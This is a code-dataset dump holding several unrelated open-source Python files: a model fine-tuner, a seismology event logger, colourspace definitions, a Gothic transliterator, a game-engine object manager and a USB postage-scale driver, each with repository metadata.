hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a0a06091ec209d847b7de3bee0f523f4913b47a
| 902
|
py
|
Python
|
extinct/components/models/finetuning.py
|
olliethomas/extinct-dino
|
7d47d8f7763d9791fa8d5027898b27fcee0901c4
|
[
"Apache-2.0"
] | null | null | null |
extinct/components/models/finetuning.py
|
olliethomas/extinct-dino
|
7d47d8f7763d9791fa8d5027898b27fcee0901c4
|
[
"Apache-2.0"
] | 1
|
2021-10-13T14:21:10.000Z
|
2021-10-13T14:21:10.000Z
|
extinct/components/models/finetuning.py
|
olliethomas/extinct-dino
|
7d47d8f7763d9791fa8d5027898b27fcee0901c4
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import annotations
from kit import implements
import pytorch_lightning as pl
import torch
from torch import Tensor, nn, optim
from extinct.components.models import ErmBaseline
__all__ = ["FineTuner"]
class FineTuner(ErmBaseline):
def reset_parameters(self) -> None:
self.clf.apply(self._maybe_reset_parameters)
@implements(nn.Module)
def forward(self, x: Tensor) -> Tensor:
with torch.no_grad():
z = self.enc(x)
return self.clf(z)
@implements(pl.LightningModule)
def configure_optimizers(
self,
) -> tuple[list[optim.Optimizer], list[optim.lr_scheduler.ExponentialLR]]:
opt = optim.AdamW(
self.clf.parameters(), lr=self.learning_rate, weight_decay=self.weight_decay
)
sched = optim.lr_scheduler.ExponentialLR(optimizer=opt, gamma=self.lr_gamma)
return [opt], [sched]
| 28.1875
| 88
| 0.68847
|
4a0a066c16365450e30da1ac665c80d182e02347
| 2,130
|
py
|
Python
|
src/trunk/apps/python/sceplog.py
|
thefroid/seiscomp3
|
0b05d5550dcea000a93c7d9a39c5347d8786a91a
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | 2
|
2015-09-17T22:43:50.000Z
|
2017-11-29T20:27:11.000Z
|
src/trunk/apps/python/sceplog.py
|
thefroid/seiscomp3
|
0b05d5550dcea000a93c7d9a39c5347d8786a91a
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | 2
|
2016-04-26T00:03:09.000Z
|
2017-12-05T02:24:50.000Z
|
src/trunk/apps/python/sceplog.py
|
salichon/seiscomp3
|
4f7715f9ff9a35e7912c379ebf10446d0bceaeb2
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
#!/usr/bin/env python
############################################################################
# Copyright (C) by GFZ Potsdam #
# #
# You can redistribute and/or modify this program under the #
# terms of the SeisComP Public License. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# SeisComP Public License for more details. #
############################################################################
import sys, os
import seiscomp3.Client
class EventParameterLog(seiscomp3.Client.Application):
def __init__(self, argc, argv):
seiscomp3.Client.Application.__init__(self, argc, argv)
self.setMessagingEnabled(True)
self.setDatabaseEnabled(False, False)
self.setMessagingUsername("")
self.setPrimaryMessagingGroup(seiscomp3.Communication.Protocol.LISTENER_GROUP)
self.addMessagingSubscription("EVENT")
self.addMessagingSubscription("LOCATION")
self.addMessagingSubscription("MAGNITUDE")
self.addMessagingSubscription("AMPLITUDE")
self.addMessagingSubscription("PICK")
self.setAutoApplyNotifierEnabled(True)
self.setInterpretNotifierEnabled(True)
# EventParameter object
self._eventParameters = seiscomp3.DataModel.EventParameters()
def run(self):
if seiscomp3.Client.Application.run(self) == False:
return False
ar = seiscomp3.IO.XMLArchive()
ar.setFormattedOutput(True)
if ar.create("-") == True:
ar.writeObject(self._eventParameters)
ar.close()
# Hack to avoid the "close failed in file object destructor"
# exception
# print ""
sys.stdout.write("\n")
return True
app = EventParameterLog(len(sys.argv), sys.argv)
sys.exit(app())
| 36.101695
| 82
| 0.573709
|
4a0a0720e2b976b638cc596d0d8b9cc0897c0113
| 4,849
|
py
|
Python
|
colour/models/dataset/__init__.py
|
canavandl/colour
|
a453cd37b6135a9092d5ea5b2aafb8d19134bdff
|
[
"BSD-3-Clause"
] | 1
|
2019-06-27T11:32:48.000Z
|
2019-06-27T11:32:48.000Z
|
colour/models/dataset/__init__.py
|
canavandl/colour
|
a453cd37b6135a9092d5ea5b2aafb8d19134bdff
|
[
"BSD-3-Clause"
] | null | null | null |
colour/models/dataset/__init__.py
|
canavandl/colour
|
a453cd37b6135a9092d5ea5b2aafb8d19134bdff
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from .aces_rgb_idt import ACES_RICD
from .aces_rgb import ACES_RGB_COLOURSPACE, ACES_RGB_LOG_COLOURSPACE
from .aces_rgb import (
ACES_RGB_PROXY_10_COLOURSPACE,
ACES_RGB_PROXY_12_COLOURSPACE)
from .adobe_rgb_1998 import ADOBE_RGB_1998_COLOURSPACE
from .adobe_wide_gamut_rgb import ADOBE_WIDE_GAMUT_RGB_COLOURSPACE
from .alexa_wide_gamut_rgb import ALEXA_WIDE_GAMUT_RGB_COLOURSPACE
from .apple_rgb import APPLE_RGB_COLOURSPACE
from .best_rgb import BEST_RGB_COLOURSPACE
from .beta_rgb import BETA_RGB_COLOURSPACE
from .c_log import C_LOG_COLOURSPACE
from .cie_rgb import CIE_RGB_COLOURSPACE
from .color_match_rgb import COLOR_MATCH_RGB_COLOURSPACE
from .dci_p3 import DCI_P3_COLOURSPACE
from .don_rgb_4 import DON_RGB_4_COLOURSPACE
from .eci_rgb_v2 import ECI_RGB_V2_COLOURSPACE
from .ekta_space_ps5 import EKTA_SPACE_PS_5_COLOURSPACE
from .max_rgb import MAX_RGB_COLOURSPACE
from .ntsc_rgb import NTSC_RGB_COLOURSPACE
from .pal_secam_rgb import PAL_SECAM_RGB_COLOURSPACE
from .prophoto_rgb import PROPHOTO_RGB_COLOURSPACE
from .rec_709 import REC_709_COLOURSPACE
from .rec_2020 import REC_2020_COLOURSPACE
from .russell_rgb import RUSSELL_RGB_COLOURSPACE
from .s_log import S_LOG_COLOURSPACE
from .smptec_rgb import SMPTE_C_RGB_COLOURSPACE
from .srgb import sRGB_COLOURSPACE
from .xtreme_rgb import XTREME_RGB_COLOURSPACE
from .pointer_gamut import POINTER_GAMUT_DATA
from colour.utilities import CaseInsensitiveMapping
RGB_COLOURSPACES = CaseInsensitiveMapping(
{ACES_RGB_COLOURSPACE.name: ACES_RGB_COLOURSPACE,
ACES_RGB_LOG_COLOURSPACE.name: ACES_RGB_LOG_COLOURSPACE,
ACES_RGB_PROXY_10_COLOURSPACE.name: ACES_RGB_PROXY_10_COLOURSPACE,
ACES_RGB_PROXY_12_COLOURSPACE.name: ACES_RGB_PROXY_12_COLOURSPACE,
ADOBE_RGB_1998_COLOURSPACE.name: ADOBE_RGB_1998_COLOURSPACE,
ADOBE_WIDE_GAMUT_RGB_COLOURSPACE.name: ADOBE_WIDE_GAMUT_RGB_COLOURSPACE,
ALEXA_WIDE_GAMUT_RGB_COLOURSPACE.name: ALEXA_WIDE_GAMUT_RGB_COLOURSPACE,
APPLE_RGB_COLOURSPACE.name: APPLE_RGB_COLOURSPACE,
BEST_RGB_COLOURSPACE.name: BEST_RGB_COLOURSPACE,
BETA_RGB_COLOURSPACE.name: BETA_RGB_COLOURSPACE,
CIE_RGB_COLOURSPACE.name: CIE_RGB_COLOURSPACE,
C_LOG_COLOURSPACE.name: C_LOG_COLOURSPACE,
COLOR_MATCH_RGB_COLOURSPACE.name: COLOR_MATCH_RGB_COLOURSPACE,
DCI_P3_COLOURSPACE.name: DCI_P3_COLOURSPACE,
DON_RGB_4_COLOURSPACE.name: DON_RGB_4_COLOURSPACE,
ECI_RGB_V2_COLOURSPACE.name: ECI_RGB_V2_COLOURSPACE,
EKTA_SPACE_PS_5_COLOURSPACE.name: EKTA_SPACE_PS_5_COLOURSPACE,
MAX_RGB_COLOURSPACE.name: MAX_RGB_COLOURSPACE,
NTSC_RGB_COLOURSPACE.name: NTSC_RGB_COLOURSPACE,
PAL_SECAM_RGB_COLOURSPACE.name: PAL_SECAM_RGB_COLOURSPACE,
PROPHOTO_RGB_COLOURSPACE.name: PROPHOTO_RGB_COLOURSPACE,
REC_709_COLOURSPACE.name: REC_709_COLOURSPACE,
REC_2020_COLOURSPACE.name: REC_2020_COLOURSPACE,
RUSSELL_RGB_COLOURSPACE.name: RUSSELL_RGB_COLOURSPACE,
S_LOG_COLOURSPACE.name: S_LOG_COLOURSPACE,
SMPTE_C_RGB_COLOURSPACE.name: SMPTE_C_RGB_COLOURSPACE,
sRGB_COLOURSPACE.name: sRGB_COLOURSPACE,
XTREME_RGB_COLOURSPACE.name: XTREME_RGB_COLOURSPACE})
"""
Aggregated *RGB* colourspaces.
RGB_COLOURSPACES : dict
Aliases:
- 'aces': ACES_RGB_COLOURSPACE.name
- 'adobe1998': ADOBE_RGB_1998_COLOURSPACE.name
- 'prophoto': PROPHOTO_RGB_COLOURSPACE.name
"""
RGB_COLOURSPACES['aces'] = (
RGB_COLOURSPACES[ACES_RGB_COLOURSPACE.name])
RGB_COLOURSPACES['adobe1998'] = (
RGB_COLOURSPACES[ADOBE_RGB_1998_COLOURSPACE.name])
RGB_COLOURSPACES['prophoto'] = (
RGB_COLOURSPACES[PROPHOTO_RGB_COLOURSPACE.name])
__all__ = ['ACES_RICD']
__all__ += ['RGB_COLOURSPACES']
__all__ += ['ACES_RGB_COLOURSPACE',
'ACES_RGB_LOG_COLOURSPACE',
'ACES_RGB_PROXY_10_COLOURSPACE',
'ACES_RGB_PROXY_12_COLOURSPACE',
'ADOBE_RGB_1998_COLOURSPACE',
'ADOBE_WIDE_GAMUT_RGB_COLOURSPACE',
'ALEXA_WIDE_GAMUT_RGB_COLOURSPACE',
'APPLE_RGB_COLOURSPACE',
'BEST_RGB_COLOURSPACE',
'BETA_RGB_COLOURSPACE',
'CIE_RGB_COLOURSPACE',
'C_LOG_COLOURSPACE',
'COLOR_MATCH_RGB_COLOURSPACE',
'DCI_P3_COLOURSPACE',
'DON_RGB_4_COLOURSPACE',
'ECI_RGB_V2_COLOURSPACE',
'EKTA_SPACE_PS_5_COLOURSPACE',
'MAX_RGB_COLOURSPACE',
'NTSC_RGB_COLOURSPACE',
'PAL_SECAM_RGB_COLOURSPACE',
'PROPHOTO_RGB_COLOURSPACE',
'REC_709_COLOURSPACE',
'REC_2020_COLOURSPACE',
'RUSSELL_RGB_COLOURSPACE',
'S_LOG_COLOURSPACE',
'SMPTE_C_RGB_COLOURSPACE',
'sRGB_COLOURSPACE',
'XTREME_RGB_COLOURSPACE']
__all__ += ['POINTER_GAMUT_DATA']
| 41.09322
| 77
| 0.783254
|
4a0a0aad4162d9d8c545be609b98fdaf6362f15b
| 18,994
|
py
|
Python
|
src/objects/manager.py
|
reddcoin-project/ReddConnect
|
5c212683de6b80b81fd15ed05239c3a1b46c3afd
|
[
"BSD-3-Clause"
] | 2
|
2019-02-24T00:20:47.000Z
|
2020-04-24T15:50:31.000Z
|
src/objects/manager.py
|
reddcoin-project/ReddConnect
|
5c212683de6b80b81fd15ed05239c3a1b46c3afd
|
[
"BSD-3-Clause"
] | null | null | null |
src/objects/manager.py
|
reddcoin-project/ReddConnect
|
5c212683de6b80b81fd15ed05239c3a1b46c3afd
|
[
"BSD-3-Clause"
] | 1
|
2019-01-05T15:51:37.000Z
|
2019-01-05T15:51:37.000Z
|
"""
Custom manager for Objects.
"""
from itertools import chain
from django.db.models import Q
from django.conf import settings
from django.db.models.fields import exceptions
from src.typeclasses.managers import TypedObjectManager
from src.typeclasses.managers import returns_typeclass, returns_typeclass_list
from src.utils import utils
from src.utils.utils import to_unicode, is_iter, make_iter, string_partial_matching
__all__ = ("ObjectManager",)
_GA = object.__getattribute__
# delayed import
_ATTR = None
# Try to use a custom way to parse id-tagged multimatches.
_AT_MULTIMATCH_INPUT = utils.variable_from_module(*settings.SEARCH_AT_MULTIMATCH_INPUT.rsplit('.', 1))
class ObjectManager(TypedObjectManager):
"""
This ObjectManager implementes methods for searching
and manipulating Objects directly from the database.
Evennia-specific search methods (will return Typeclasses or
lists of Typeclasses, whereas Django-general methods will return
Querysets or database objects).
dbref (converter)
get_id (alias: dbref_search)
get_dbref_range
object_totals
typeclass_search
get_object_with_player
get_objs_with_key_and_typeclass
get_objs_with_attr
get_objs_with_attr_match
get_objs_with_db_property
get_objs_with_db_property_match
get_objs_with_key_or_alias
get_contents
object_search (interface to many of the above methods,
equivalent to ev.search_object)
copy_object
"""
#
# ObjectManager Get methods
#
# player related
@returns_typeclass
def get_object_with_player(self, ostring, exact=True, candidates=None):
"""
Search for an object based on its player's name or dbref.
This search
is sometimes initiated by appending a * to the beginning of
the search criterion (e.g. in local_and_global_search).
search_string: (string) The name or dbref to search for.
"""
ostring = to_unicode(ostring).lstrip('*')
# simplest case - search by dbref
dbref = self.dbref(ostring)
if dbref:
return dbref
# not a dbref. Search by name.
cand_restriction = candidates != None and Q(pk__in=[_GA(obj, "id") for obj in make_iter(candidates) if obj]) or Q()
if exact:
return self.filter(cand_restriction & Q(db_player__username__iexact=ostring))
else: # fuzzy matching
ply_cands = self.filter(cand_restriction & Q(playerdb__username__istartswith=ostring)).values_list("db_key", flat=True)
if candidates:
index_matches = string_partial_matching(ply_cands, ostring, ret_index=True)
return [obj for ind, obj in enumerate(make_iter(candidates)) if ind in index_matches]
else:
return string_partial_matching(ply_cands, ostring, ret_index=False)
@returns_typeclass_list
def get_objs_with_key_and_typeclass(self, oname, otypeclass_path, candidates=None):
"""
Returns objects based on simultaneous key and typeclass match.
"""
cand_restriction = candidates != None and Q(pk__in=[_GA(obj, "id") for obj in make_iter(candidates) if obj]) or Q()
return self.filter(cand_restriction & Q(db_key__iexact=oname, db_typeclass_path__exact=otypeclass_path))
# attr/property related
@returns_typeclass_list
def get_objs_with_attr(self, attribute_name, candidates=None):
"""
Returns all objects having the given attribute_name defined at all.
Location should be a valid location object.
"""
cand_restriction = candidates != None and Q(db_attributes__db_obj__pk__in=[_GA(obj, "id") for obj in make_iter(candidates) if obj]) or Q()
return list(self.filter(cand_restriction & Q(db_attributes__db_key=attribute_name)))
@returns_typeclass_list
def get_objs_with_attr_value(self, attribute_name, attribute_value, candidates=None, typeclasses=None):
"""
Returns all objects having the valid attrname set to the given value.
candidates - list of candidate objects to search
typeclasses - list of typeclass-path strings to restrict matches with
This uses the Attribute's PickledField to transparently search the database by matching
the internal representation. This is reasonably effective but since Attribute values
cannot be indexed, searching by Attribute key is to be preferred whenever possible.
"""
cand_restriction = candidates != None and Q(pk__in=[_GA(obj, "id") for obj in make_iter(candidates) if obj]) or Q()
type_restriction = typeclasses and Q(db_typeclass_path__in=make_iter(typeclasses)) or Q()
## This doesn't work if attribute_value is an object. Workaround below
if isinstance(attribute_value, (basestring, int, float, bool, long)):
return self.filter(cand_restriction & type_restriction & Q(db_attributes__db_key=attribute_name, db_attributes__db_value=attribute_value))
else:
# We have to loop for safety since the referenced lookup gives deepcopy error if attribute value is an object.
global _ATTR
if not _ATTR:
from src.typeclasses.models import Attribute as _ATTR
cands = list(self.filter(cand_restriction & type_restriction & Q(db_attributes__db_key=attribute_name)))
results = [attr.objectdb_set.all() for attr in _ATTR.objects.filter(objectdb__in=cands, db_value=attribute_value)]
return chain(*results)
@returns_typeclass_list
def get_objs_with_db_property(self, property_name, candidates=None):
"""
Returns all objects having a given db field property.
property_name = search string
candidates - list of candidate objects to search
"""
property_name = "db_%s" % property_name.lstrip('db_')
cand_restriction = candidates != None and Q(pk__in=[_GA(obj, "id") for obj in make_iter(candidates) if obj]) or Q()
querykwargs = {property_name:None}
try:
return list(self.filter(cand_restriction).exclude(Q(**querykwargs)))
except exceptions.FieldError:
return []
@returns_typeclass_list
def get_objs_with_db_property_value(self, property_name, property_value, candidates=None, typeclasses=None):
"""
Returns all objects having a given db field property.
candidates - list of objects to search
typeclasses - list of typeclass-path strings to restrict matches with
"""
if isinstance(property_value, basestring):
property_value = to_unicode(property_value)
if isinstance(property_name, basestring):
if not property_name.startswith('db_'):
property_name = "db_%s" % property_name
if hasattr(property_value, 'dbobj'):
property_value = property_value.dbobj
querykwargs = {property_name:property_value}
cand_restriction = candidates != None and Q(pk__in=[_GA(obj, "id") for obj in make_iter(candidates) if obj]) or Q()
type_restriction = typeclasses and Q(db_typeclass_path__in=make_iter(typeclasses)) or Q()
try:
return list(self.filter(cand_restriction & type_restriction & Q(**querykwargs)))
except exceptions.FieldError:
return []
except ValueError:
from src.utils import logger
logger.log_errmsg("The property '%s' does not support search criteria of the type %s." % (property_name, type(property_value)))
return []
@returns_typeclass_list
def get_contents(self, location, excludeobj=None):
"""
Get all objects that has a location
set to this one.
excludeobj - one or more object keys to exclude from the match
"""
exclude_restriction = Q(pk__in=[_GA(obj, "id") for obj in make_iter(excludeobj)]) if excludeobj else Q()
return self.filter(db_location=location).exclude(exclude_restriction)
@returns_typeclass_list
def get_objs_with_key_or_alias(self, ostring, exact=True,
candidates=None, typeclasses=None):
"""
Returns objects based on key or alias match. Will also do fuzzy
matching based on the utils.string_partial_matching function.
candidates - list of candidate objects to restrict on
typeclasses - list of typeclass path strings to restrict on
"""
if not isinstance(ostring, basestring):
if hasattr(ostring, "key"):
ostring = ostring.key
else:
return []
if is_iter(candidates) and not len(candidates):
# if candidates is an empty iterable there can be no matches
# Exit early.
return []
# build query objects
candidates_id = [_GA(obj, "id") for obj in make_iter(candidates) if obj]
cand_restriction = candidates != None and Q(pk__in=make_iter(candidates_id)) or Q()
type_restriction = typeclasses and Q(db_typeclass_path__in=make_iter(typeclasses)) or Q()
if exact:
# exact match - do direct search
return self.filter(cand_restriction & type_restriction & (Q(db_key__iexact=ostring) |
Q(db_tags__db_key__iexact=ostring) & Q(db_tags__db_tagtype__iexact="alias"))).distinct()
elif candidates:
# fuzzy with candidates
key_candidates = self.filter(cand_restriction & type_restriction)
else:
# fuzzy without supplied candidates - we select our own candidates
key_candidates = self.filter(type_restriction & (Q(db_key__istartswith=ostring) | Q(db_tags__db_key__istartswith=ostring))).distinct()
candidates_id = [_GA(obj, "id") for obj in key_candidates]
# fuzzy matching
key_strings = key_candidates.values_list("db_key", flat=True)
index_matches = string_partial_matching(key_strings, ostring, ret_index=True)
if index_matches:
return [obj for ind, obj in enumerate(key_candidates) if ind in index_matches]
else:
alias_candidates = self.filter(id__in=candidates_id, db_tags__db_tagtype__iexact="alias")
alias_strings = alias_candidates.values_list("db_key", flat=True)
index_matches = string_partial_matching(alias_strings, ostring, ret_index=True)
if index_matches:
return [alias.db_obj for ind, alias in enumerate(alias_candidates) if ind in index_matches]
return []
# main search methods and helper functions
@returns_typeclass_list
def object_search(self, searchdata,
attribute_name=None,
typeclass=None,
candidates=None,
exact=True):
"""
Search as an object globally or in a list of candidates and return
results. The result is always an Object. Always returns a list.
Arguments:
searchdata: (str or obj) The entity to match for. This is usually a
key string but may also be an object itself. By default (if
not attribute_name is set), this will search object.key and
object.aliases in order. Can also be on the form #dbref,
which will, if exact=True be matched against primary key.
attribute_name: (str): Use this named ObjectAttribute to match
searchdata against, instead of the defaults. If this is
the name of a database field (with or without the db_ prefix),
that will be matched too.
typeclass (str or TypeClass): restrict matches to objects having this
typeclass. This will help speed up global searches.
candidates (list obj ObjectDBs): If supplied, search will only be
performed among the candidates in this list. A common list
of candidates is the contents of the current location
searched.
exact (bool): Match names/aliases exactly or partially. Partial
matching matches the beginning of words in the names/aliases,
using a matching routine to separate multiple matches in
names with multiple components (so "bi sw" will match
"Big sword"). Since this is more expensive than exact
matching, it is recommended to be used together with the
objlist keyword to limit the number of possibilities. This
value has no meaning if searching for attributes/properties.
Returns:
A list of matching objects (or a list with one unique match)
"""
def _searcher(searchdata, candidates, typeclass, exact=False):
"""
Helper method for searching objects. typeclass is only used
for global searching (no candidates)
"""
if attribute_name:
# attribute/property search (always exact).
matches = self.get_objs_with_db_property_value(attribute_name, searchdata, candidates=candidates, typeclasses=typeclass)
if matches:
return matches
return self.get_objs_with_attr_value(attribute_name, searchdata, candidates=candidates, typeclasses=typeclass)
else:
# normal key/alias search
return self.get_objs_with_key_or_alias(searchdata, exact=exact, candidates=candidates, typeclasses=typeclass)
if not searchdata and searchdata != 0:
return []
if typeclass:
# typeclass may also be a list
typeclasses = make_iter(typeclass)
for i, typeclass in enumerate(make_iter(typeclasses)):
if callable(typeclass):
typeclasses[i] = u"%s.%s" % (typeclass.__module__, typeclass.__name__)
else:
typeclasses[i] = u"%s" % typeclass
typeclass = typeclasses
if candidates:
# Convenience check to make sure candidates are really dbobjs
candidates = [cand.dbobj for cand in make_iter(candidates) if cand]
if typeclass:
candidates = [cand for cand in candidates
if _GA(cand, "db_typeclass_path") in typeclass]
dbref = not attribute_name and exact and self.dbref(searchdata)
if dbref is not None:
# Easiest case - dbref matching (always exact)
dbref_match = self.dbref_search(dbref)
if dbref_match:
if not candidates or dbref_match.dbobj in candidates:
return [dbref_match]
else:
return []
# Search through all possibilities.
match_number = None
# always run first check exact - we don't want partial matches
# if on the form of 1-keyword etc.
matches = _searcher(searchdata, candidates, typeclass, exact=True)
if not matches:
# no matches found - check if we are dealing with N-keyword
# query - if so, strip it.
match_number, searchdata = _AT_MULTIMATCH_INPUT(searchdata)
# run search again, with the exactness set by call
if match_number is not None or not exact:
matches = _searcher(searchdata, candidates, typeclass, exact=exact)
# deal with result
if len(matches) > 1 and match_number is not None:
# multiple matches, but a number was given to separate them
try:
matches = [matches[match_number]]
except IndexError:
pass
# return a list (possibly empty)
return matches
#
# ObjectManager Copy method
#
def copy_object(self, original_object, new_key=None,
new_location=None, new_home=None,
new_permissions=None, new_locks=None,
new_aliases=None, new_destination=None):
"""
Create and return a new object as a copy of the original object. All
will be identical to the original except for the arguments given
specifically to this method.
original_object (obj) - the object to make a copy from
new_key (str) - name the copy differently from the original.
new_location (obj) - if not None, change the location
new_home (obj) - if not None, change the Home
new_aliases (list of strings) - if not None, change object aliases.
new_destination (obj) - if not None, change destination
"""
# get all the object's stats
typeclass_path = original_object.typeclass_path
if not new_key:
new_key = original_object.key
if not new_location:
new_location = original_object.location
if not new_home:
new_home = original_object.home
if not new_aliases:
new_aliases = original_object.aliases.all()
if not new_locks:
new_locks = original_object.db_lock_storage
if not new_permissions:
new_permissions = original_object.permissions.all()
if not new_destination:
new_destination = original_object.destination
# create new object
from src.utils import create
from src.scripts.models import ScriptDB
new_object = create.create_object(typeclass_path,
key=new_key,
location=new_location,
home=new_home,
permissions=new_permissions,
locks=new_locks,
aliases=new_aliases,
destination=new_destination)
if not new_object:
return None
# copy over all attributes from old to new.
for attr in original_object.attributes.all():
new_object.attributes.add(attr.key, attr.value)
# copy over all cmdsets, if any
for icmdset, cmdset in enumerate(original_object.cmdset.all()):
if icmdset == 0:
new_object.cmdset.add_default(cmdset)
else:
new_object.cmdset.add(cmdset)
# copy over all scripts, if any
for script in original_object.scripts.all():
ScriptDB.objects.copy_script(script, new_obj=new_object.dbobj)
return new_object
def clear_all_sessids(self):
"""
Clear the db_sessid field of all objects having also the db_player field
set.
"""
self.filter(db_sessid__isnull=False).update(db_sessid=None)
| 45.768675
| 150
| 0.642571
|
4a0a0b47bc5f2efc43e089e34302691f85d1ead8
| 2,031
|
py
|
Python
|
pieoffice/gothic.py
|
caiogeraldes/pieoffice
|
472a98081bdf83d776ac8b05d377bf7fec2fe96b
|
[
"MIT"
] | null | null | null |
pieoffice/gothic.py
|
caiogeraldes/pieoffice
|
472a98081bdf83d776ac8b05d377bf7fec2fe96b
|
[
"MIT"
] | null | null | null |
pieoffice/gothic.py
|
caiogeraldes/pieoffice
|
472a98081bdf83d776ac8b05d377bf7fec2fe96b
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python3
""" Gothic converter
The transliteration scheme is as follows
-----------------------------------------------------------------------
| a 𐌰 | b 𐌱 | g 𐌲 | d 𐌳 | e 𐌴 | q 𐌵 | z 𐌶 |
| h 𐌷 | th 𐌸 | i 𐌹 | k 𐌺 | l 𐌻 | m 𐌼 | n 𐌽 |
| j 𐌾 | u 𐌿 | p 𐍀 | q' 𐍁 | r 𐍂 | s 𐍃 | t 𐍄 |
| w 𐍅 | f 𐍆 | x 𐍇 | hw 𐍈 | o 𐍉 | z' 𐍊 | |
-----------------------------------------------------------------------
"""
def alpha_to_gothic(input):
"""
Parameters
----------
input : str
Text input with syllables separated by dashes and words by spaces.
Returns
-------
output : str
Transliterated text in Gothic Script
"""
# print(input.translate(script))
output = input
output = output.replace("th", "𐌸")
output = output.replace("q'", "𐍁")
output = output.replace("z'", "𐍊")
output = output.replace("hw", "𐍈")
output = output.replace("a", "𐌰")
output = output.replace("b", "𐌱")
output = output.replace("g", "𐌲")
output = output.replace("d", "𐌳")
output = output.replace("e", "𐌴")
output = output.replace("q", "𐌵")
output = output.replace("z", "𐌶")
output = output.replace("h", "𐌷")
output = output.replace("i", "𐌹")
output = output.replace("k", "𐌺")
output = output.replace("l", "𐌻")
output = output.replace("m", "𐌼")
output = output.replace("n", "𐌽")
output = output.replace("j", "𐌾")
output = output.replace("u", "𐌿")
output = output.replace("p", "𐍀")
output = output.replace("r", "𐍂")
output = output.replace("s", "𐍃")
output = output.replace("t", "𐍄")
output = output.replace("w", "𐍅")
output = output.replace("f", "𐍆")
output = output.replace("x", "𐍇")
output = output.replace("o", "𐍉")
return output
if __name__ == "__main__":
a = """
wulfila
"""
b = alpha_to_gothic(a)
print(b)
| 29.434783
| 75
| 0.458887
|
4a0a0b8871e54a62cce1a61910b02aecdff62120
| 3,515
|
py
|
Python
|
dymouse/driver/USBScale.py
|
x4rMa/dymouse
|
0304837f4af362ec33ec6da09c7eb6a9840dcca6
|
[
"MIT"
] | 2
|
2020-11-02T17:52:01.000Z
|
2021-02-25T14:34:24.000Z
|
dymouse/driver/USBScale.py
|
x4rMa/dymouse
|
0304837f4af362ec33ec6da09c7eb6a9840dcca6
|
[
"MIT"
] | null | null | null |
dymouse/driver/USBScale.py
|
x4rMa/dymouse
|
0304837f4af362ec33ec6da09c7eb6a9840dcca6
|
[
"MIT"
] | null | null | null |
from datetime import datetime
import time
import usb.core
import usb.util
class USBScaleSingleton(object):
"""
Singleton class for the DymoUSBScale
(Useful to avoid repeatedly creating/destroying
instances of the scale)
"""
def __new__(self,**kwargs):
try:
return self.scale
except AttributeError:
self.scale = DymoUSBScale(**kwargs)
return self.scale
class DymoUSBScale(object):
"""
Driver for Dymo USB postage scale
"""
def __init__(self,sleep_time=1.0,init=True):
self.VENDOR_ID = 0x0922
self.PRODUCT_ID = 0x8004
self.DATA_MODE_GRAMS = 2
self.DATA_MODE_OUNCES = 11
if init:
self.device_init()
def device_init(self):
# find the USB device
self.device = usb.core.find(idVendor=self.VENDOR_ID,
idProduct=self.PRODUCT_ID)
try:
self.device.detach_kernel_driver(0)
except Exception, e:
print "Unable to detach USB device from kernel driver. Continuing..."
pass
# use the first/default configuration
self.device.set_configuration()
# first endpoint
endpoint = self.device[0][(0,0)][0]
# see charlesreid1.com/wiki/USB_Scale/RaspberryPi
self.ea = endpoint.bEndpointAddress
self.ps = endpoint.wMaxPacketSize
try:
self.device.read(self.ea, self.ps)
except usb.core.USBError:
pass
def read_value(self):
# flush out the first few data values
preload = 3
while preload > 0:
try:
self.device.read(self.ea,self.ps)
except usb.core.USBError:
pass
preload -= 1
# read a data packet
attempts = 3
data = None
while data is None and attempts > 0:
try:
data = self.device.read(self.ea, self.ps)
except usb.core.USBError as e:
data = None
if e.args == ('Operation timed out',):
attempts -= 10
continue
raw_weight = data[4] + data[5] * 256
data_mode = data[2]
return datetime.now(), raw_weight, data_mode
def get_weight(self,mode):
return self.get(mode)
def get_grams(self):
return self.get('grams')
def get_ounces(self):
return self.get('ounces')
def get_lboz(self):
return self.get('lboz')
def get_lb(self):
return self.get('lb')
def get(self,units):
timestamp, raw_weight, data_mode = self.read_value()
ounces=0
grams=0
g2oz = 0.035274
if data_mode==self.DATA_MODE_OUNCES:
ounces = raw_weight * 0.1
grams = ounces/g2oz
elif data_mode==self.DATA_MODE_GRAMS:
grams = raw_weight
ounces = grams*g2oz
if units=='grams':
return timestamp,grams
elif units=='ounces':
return timestamp,ounces
elif units=='lboz':
lb, oz = divmod(ounces, 16)
return timestamp,lb,oz
elif units=='lb':
lb = timestamp,ounces/16.0
return timestamp,lb
def echo(self):
print "Grams:",self.get_grams()
print "lb:",self.get_lb()
print "lb/oz:",self.get_lboz()
print "oz:",self.get_ounces()
